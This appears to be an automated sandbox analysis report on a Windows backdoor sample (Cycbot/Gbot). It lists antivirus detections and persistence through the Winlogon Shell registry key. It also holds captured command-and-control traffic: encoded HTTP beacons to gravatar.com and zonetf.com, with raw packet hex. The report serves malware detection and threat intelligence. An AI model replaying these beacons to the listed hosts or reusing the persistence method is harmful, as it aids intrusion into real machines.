Analysis | #totalhash

Analysis Date	2014-06-27 16:27:07
MD5	65384b11a8a9d821e9b75d5a21e94596
SHA1	383a667f581b04ccde922785bcc053359183863e

Static Details:

File type	PE32 executable for MS Windows (GUI) Intel 80386
Section	.text md5: d688dffe645dbd92d1b1222ada9f85d8 sha1: 7ad01f3dca73817049463b99b24acb6cea482c52 size: 114688
Section	.rdata md5: cfbc29d6d989b553e1271b736b53f45a sha1: 8b4a778039d1dac212d40e8c7bf975bffb1e89b6 size: 1024
Section	.data md5: b98c34c00f7b3041f1673b36dcfe3ce5 sha1: 0189a115f508ff96ef8920c93e1e2f6726320bd8 size: 54784
Section	.apexi md5: 3ed17bd054c4931219318e47016cbb1b sha1: be2fdf898ed843c4fcabd9da0a7333cd47940c91 size: 1024
Timestamp	2005-11-22 11:17:16
Version	ProductVersion: 1.0.0.3 FileVersion: 1.0.0.3 PrivateBuild: 1686
PEhash	a29b1e9ff59e26558a34c12665954db5eedb993e
IMPhash	49a61c9f91380828577efbce215c05e3
AV	360 Safe	Gen:Trojan.Heur.KS.1
AV	Ad-Aware	Gen:Trojan.Heur.KS.1
AV	Alwil (avast)	Cybota [Trj]
AV	Arcabit (arcavir)	no_virus
AV	Authentium	W32/Goolbot.G.gen!Eldorado
AV	Avira (antivir)	BDS/Gbot.aida
AV	CA (E-Trust Ino)	Win32/Cycbot.G!generic
AV	CAT (quickheal)	Backdoor.Cycbot.B
AV	ClamAV	no_virus
AV	Dr. Web	BackDoor.Gbot.34
AV	Emsisoft	Gen:Trojan.Heur.KS.1
AV	Eset (nod32)	Win32/Kryptik.MIA
AV	Fortinet	W32/FraudLoad.MK!tr
AV	Frisk (f-prot)	W32/Goolbot.G.gen!Eldorado (generic, not disinfectable)
AV	F-Secure	Gen:Trojan.Heur.KS.1
AV	Grisoft (avg)	Win32/Heri
AV	Ikarus	Backdoor.Win32.Gbot
AV	K7	Backdoor ( 003210941 )
AV	Kaspersky	Trojan.Win32.Generic
AV	MalwareBytes	Trojan.Agent
AV	Mcafee	BackDoor-EXI.gen.i
AV	Microsoft Security Essentials	Backdoor:Win32/Cycbot.G
AV	MicroWorld (escan)	Gen:Trojan.Heur.KS.1
AV	Norman	winpe/Cycbot.BP
AV	Rising	no_virus
AV	Sophos	Mal/FakeAV-IS
AV	Symantec	Backdoor.Cycbot!gen3
AV	Trend Micro	BKDR_CYCBOT.SMX
AV	VirusBlokAda (vba32)	no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry	HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File	C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File	C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File	C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File	PIPE\lsarpc
Creates File	C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File	\Device\Afd\Endpoint
Creates File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process	C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process	C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process	C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex	WininetConnectionMutex
Creates Mutex	c:!documents and settings!administrator!cookies!
Creates Mutex	{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex	{655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutex	c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex	{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex	c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex	{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS	127.0.0.1
Winsock DNS	gravatar.com
Winsock DNS	extremerollerclub.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process	C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process	C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNS	gravatar.com Type: A 192.0.80.239
DNS	gravatar.com Type: A 192.0.80.240
DNS	gravatar.com Type: A 192.0.80.241
DNS	gravatar.com Type: A 192.0.80.242
DNS	zonetf.com Type: A 208.73.211.163
DNS	zonetf.com Type: A 208.73.211.174
DNS	zonetf.com Type: A 208.73.211.175
DNS	zonetf.com Type: A 208.73.211.193
DNS	zonetf.com Type: A 208.73.211.242
DNS	zonetf.com Type: A 208.73.211.163
DNS	zonetf.com Type: A 208.73.211.174
DNS	zonetf.com Type: A 208.73.211.175
DNS	zonetf.com Type: A 208.73.211.193
DNS	zonetf.com Type: A 208.73.211.242
DNS	extremerollerclub.com Type: A
HTTP GET	http://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be2?v53=3&tq=gKZEtzyslLXoMNy5xQPoP0nd9IUXLoYgtJhBbSLy3unUwf7inVJlR%2FVodhhsWm7dK45EsPE93GTsU05s%2B5iIkXauPEOgE9Xtsc0gytX3t%2BkW%2F1198mh4Pl%2BVaZkbdS05ZdZ91VOHg7h84J2%2FrEOdcRJHIJqGpQbqaixD9uwUaoSFIaEYR6yeRCErf8pHvcTm3TDbRhGIhr%2FZ3Noy3xUl3h3poZnH5hkX4ZXr6WXK%2BsxgNMpzkR8ZVVoprJuvNFXklc1cB0rC5UwCS%2FPFiByi1HhSw0Gl0wz0FDmXskLYZLCnNNjP3p%2FodepO%2BA1T2LAxh User-Agent: mozilla/2.0
HTTP POST	http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST	http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST	http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST	http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNw1Kv975Xlm5G User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST	http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJtX%2BSNxr5ygm1C4lKv975Xlm5G User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP	192.168.1.1:1031 ➝ 192.0.80.239:80
Flows TCP	192.168.1.1:1033 ➝ 208.73.211.163:80
Flows TCP	192.168.1.1:1034 ➝ 208.73.211.163:80
Flows TCP	192.168.1.1:1035 ➝ 208.73.211.163:80
Flows TCP	192.168.1.1:1036 ➝ 208.73.211.163:80
Flows TCP	192.168.1.1:1037 ➝ 208.73.211.163:80

Raw Pcap

0x00000000 (00000)   47455420 2f617661 7461722e 7068703f   GET /avatar.php?
0x00000010 (00016)   67726176 61746172 5f69643d 66326133   gravatar_id=f2a3
0x00000020 (00032)   38383961 66663666 63393731 31613363   889aff6fc9711a3c
0x00000030 (00048)   62636665 36343036 37626532 3f763533   bcfe64067be2?v53
0x00000040 (00064)   3d332674 713d674b 5a45747a 79736c4c   =3&tq=gKZEtzyslL
0x00000050 (00080)   586f4d4e 79357851 506f5030 6e643949   XoMNy5xQPoP0nd9I
0x00000060 (00096)   55584c6f 5967744a 68426253 4c793375   UXLoYgtJhBbSLy3u
0x00000070 (00112)   6e557766 37696e56 4a6c5225 3246566f   nUwf7inVJlR%2FVo
0x00000080 (00128)   64686873 576d3764 4b343545 73504539   dhhsWm7dK45EsPE9
0x00000090 (00144)   33475473 55303573 25324235 69496b58   3GTsU05s%2B5iIkX
0x000000a0 (00160)   61755045 4f674539 58747363 30677974   auPEOgE9Xtsc0gyt
0x000000b0 (00176)   58337425 32426b57 25324631 3139386d   X3t%2BkW%2F1198m
0x000000c0 (00192)   6834506c 25324256 615a6b62 64533035   h4Pl%2BVaZkbdS05
0x000000d0 (00208)   5a645a39 31564f48 67376838 344a3225   ZdZ91VOHg7h84J2%
0x000000e0 (00224)   32467245 4f646352 4a48494a 71477051   2FrEOdcRJHIJqGpQ
0x000000f0 (00240)   62716169 78443975 7755616f 53464961   bqaixD9uwUaoSFIa
0x00000100 (00256)   45595236 79655243 45726638 70487663   EYR6yeRCErf8pHvc
0x00000110 (00272)   546d3354 44625268 47496872 2532465a   Tm3TDbRhGIhr%2FZ
0x00000120 (00288)   334e6f79 3378556c 33683370 6f5a6e48   3Noy3xUl3h3poZnH
0x00000130 (00304)   35686b58 345a5872 3657584b 25324273   5hkX4ZXr6WXK%2Bs
0x00000140 (00320)   78674e4d 707a6b52 385a5656 6f70724a   xgNMpzkR8ZVVoprJ
0x00000150 (00336)   75764e46 586b6c63 31634230 72433555   uvNFXklc1cB0rC5U
0x00000160 (00352)   77435325 32465046 69427969 31486853   wCS%2FPFiByi1HhS
0x00000170 (00368)   7730476c 30777a30 46446d58 736b4c59   w0Gl0wz0FDmXskLY
0x00000180 (00384)   5a4c436e 4e4e6a50 33702532 466f6465   ZLCnNNjP3p%2Fode
0x00000190 (00400)   704f2532 42413154 324c4178 68204854   pO%2BA1T2LAxh HT
0x000001a0 (00416)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x000001b0 (00432)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x000001c0 (00448)   20677261 76617461 722e636f 6d0d0a41    gravatar.com..A
0x000001d0 (00464)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000001e0 (00480)   2d416765 6e743a20 6d6f7a69 6c6c612f   -Agent: mozilla/
0x000001f0 (00496)   322e300d 0a0d0a                       2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6f5825 32425039 68253242 49307344   NoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 786c4b76 39373558   JuX%2BSNxlKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a634230 72433555   close....cB0rC5U
0x00000160 (00352)   77435325 32465046 69427969 31486853   wCS%2FPFiByi1HhS
0x00000170 (00368)   7730476c 30777a30 46446d58 736b4c59   w0Gl0wz0FDmXskLY
0x00000180 (00384)   5a4c436e 4e4e6a50 33702532 466f6465   ZLCnNNjP3p%2Fode
0x00000190 (00400)   704f2532 42413154 324c4178 68204854   pO%2BA1T2LAxh HT
0x000001a0 (00416)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x000001b0 (00432)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x000001c0 (00448)   20677261 76617461 722e636f 6d0d0a41    gravatar.com..A
0x000001d0 (00464)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000001e0 (00480)   2d416765 6e743a20 6d6f7a69 6c6c612f   -Agent: mozilla/
0x000001f0 (00496)   322e300d 0a0d0a                       2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6f5825 32425039 68253242 49307344   NoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a75   OhLgjh88y%2BcoJu
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6f5825 32425039 68253242 49307344   NoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a73 650d0a0d 0a634230 72433555   ...se....cB0rC5U
0x00000160 (00352)   77435325 32465046 69427969 31486853   wCS%2FPFiByi1HhS
0x00000170 (00368)   7730476c 30777a30 46446d58 736b4c59   w0Gl0wz0FDmXskLY
0x00000180 (00384)   5a4c436e 4e4e6a50 33702532 466f6465   ZLCnNNjP3p%2Fode
0x00000190 (00400)   704f2532 42413154 324c4178 68204854   pO%2BA1T2LAxh HT
0x000001a0 (00416)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x000001b0 (00432)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x000001c0 (00448)   20677261 76617461 722e636f 6d0d0a41    gravatar.com..A
0x000001d0 (00464)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000001e0 (00480)   2d416765 6e743a20 6d6f7a69 6c6c612f   -Agent: mozilla/
0x000001f0 (00496)   322e300d 0a0d0a                       2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6f5825 32425039 68253242 49307344   NoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a75   OhLgjh8sG%2BcoJu
0x000000c0 (00192)   58253242 534e7731 4b763937 35586c6d   X%2BSNw1Kv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6f5825 32425039 68253242 49307344   NoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 46383225 3242636f   OhLgjh%2F82%2Bco
0x000000c0 (00192)   4a745825 3242534e 78723579 676d3143   JtX%2BSNxr5ygm1C
0x000000d0 (00208)   346c4b76 39373558 6c6d3547 20485454   4lKv975Xlm5G HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6574662e 636f6d0d 0a557365 722d4167   etf.com..User-Ag
0x00000100 (00256)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000110 (00272)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000120 (00288)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000130 (00304)   4e542035 2e31290d 0a436f6e 74656e74   NT 5.1)..Content
0x00000140 (00320)   2d4c656e 6774683a 20300d0a 436f6e6e   -Length: 0..Conn
0x00000150 (00336)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x00000160 (00352)   0a435325 32465046 69427969 31486853   .CS%2FPFiByi1HhS
0x00000170 (00368)   7730476c 30777a30 46446d58 736b4c59   w0Gl0wz0FDmXskLY
0x00000180 (00384)   5a4c436e 4e4e6a50 33702532 466f6465   ZLCnNNjP3p%2Fode
0x00000190 (00400)   704f2532 42413154 324c4178 68204854   pO%2BA1T2LAxh HT
0x000001a0 (00416)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x000001b0 (00432)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x000001c0 (00448)   20677261 76617461 722e636f 6d0d0a41    gravatar.com..A
0x000001d0 (00464)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000001e0 (00480)   2d416765 6e743a20 6d6f7a69 6c6c612f   -Agent: mozilla/
0x000001f0 (00496)   322e300d 0a0d0a                       2.0....

Strings

.
.o..}........
a.6&.t=.....3z5..m
.
U..u.
T]..B.
.*....{[..N....i
......N3./}q.r.B... S......~>=qp...51.Y]h..
.Wk
.
.
V.
.
040904b0
1.0.0.3
1686
2C2C
AqAD
c`GP
DB`A
"EC"
FileVersion
jjjjjj
PCGF
PrivateBuild
ProductVersion
qTTac
RF`#
RqR"
StringFileInfo
TASa
TIMES NEW ROMAN
Translation
UsVW
VarFileInfo
V"rj
VS_VERSION_INFO
.<(}<@
11=	K>VeiS
1Nx_y{
1-R	h}
1/S=[L
2S*J_3,
2u4Ld[v&
2VVxhL
3e,"4=~
&3L+K	p8	svdB
5	"o.Sh
`5wjL}
63w=a8
+%7aui1X
"!:|8-
	A)A$]Ms
&AIq/s
.apexi
b<sGZ3
BzIMZT]
C$d+~L
CheckRemoteDebuggerPresent
cN@/r	
CreateWindowExW
cR!O0|
D2MC^h7
@.data
dFW`sZ3
	dmKKp
Eh&ljn7_
EndDialog
EnumResourceTypesW
FC2-y0
GetFileType
GetParent
GetStartupInfoA
GetWindowInfo
G-hC3G
g> u7A
Gv>eQF
>g^|yx
GZw7FWo
HeapCreate
%}h/ncKB/
h	tLCl
I$;8oC
I9\BoC
InitializeCriticalSection
I=_t%m
I@Uum:
j<4m+i
J)tV=D
K9 &F+
KERNEL32.dll
(kI;i*q)%"
KUW\+~0k
@\KWEI
K~xEB_4S]G
l].$#:5
=lDv/9
@&%Lf}
ljm$(V
LoadCursorW
|Lq[gz
LresultFromObject
lstrcpynW
l%upaX
M[>,%*
m6y5yr
mA-Jo&_rG
MessageBoxW
:M$nxhuQk#
MXn+\q]"
>MZL;k
N0-or5
nn8	qc
+#N/vk
n)+wki
O}3|qq
|oCa"[uV
OLEACC.dll
pp7VK#
*PQi4C
P$s#g8
(qj%PAm
!|Q)	l
r|3X%r
r6:VH9M
`.rdata
RegisterClassExW
R]G4)c)
r'IssK
RkH.%3(
|R>,L2I
")|(~T
!This program cannot be run in DOS mode.
TlsAlloc
TlsFree
TlsGetValue
"tN1{@
	;t;sO
|Tv|:Ll
ueg]ks
USER32.dll
u@Z+gT
!v_OG&
V	=R]wP
w9#wkZ
@!w;a@km
WVB.tsJ
Wv}l{a'
<|ww.w6
x*:hA9
XL4l,x
xR[4tI
(#:	Y/
y}c99IE
YiX[=+
y>; ~N
ynd=<gz
{;Y}\+t}hx
Z6,dmi{
zCwE9	
-Zjs<J
z]vD3!@	
zwb}#g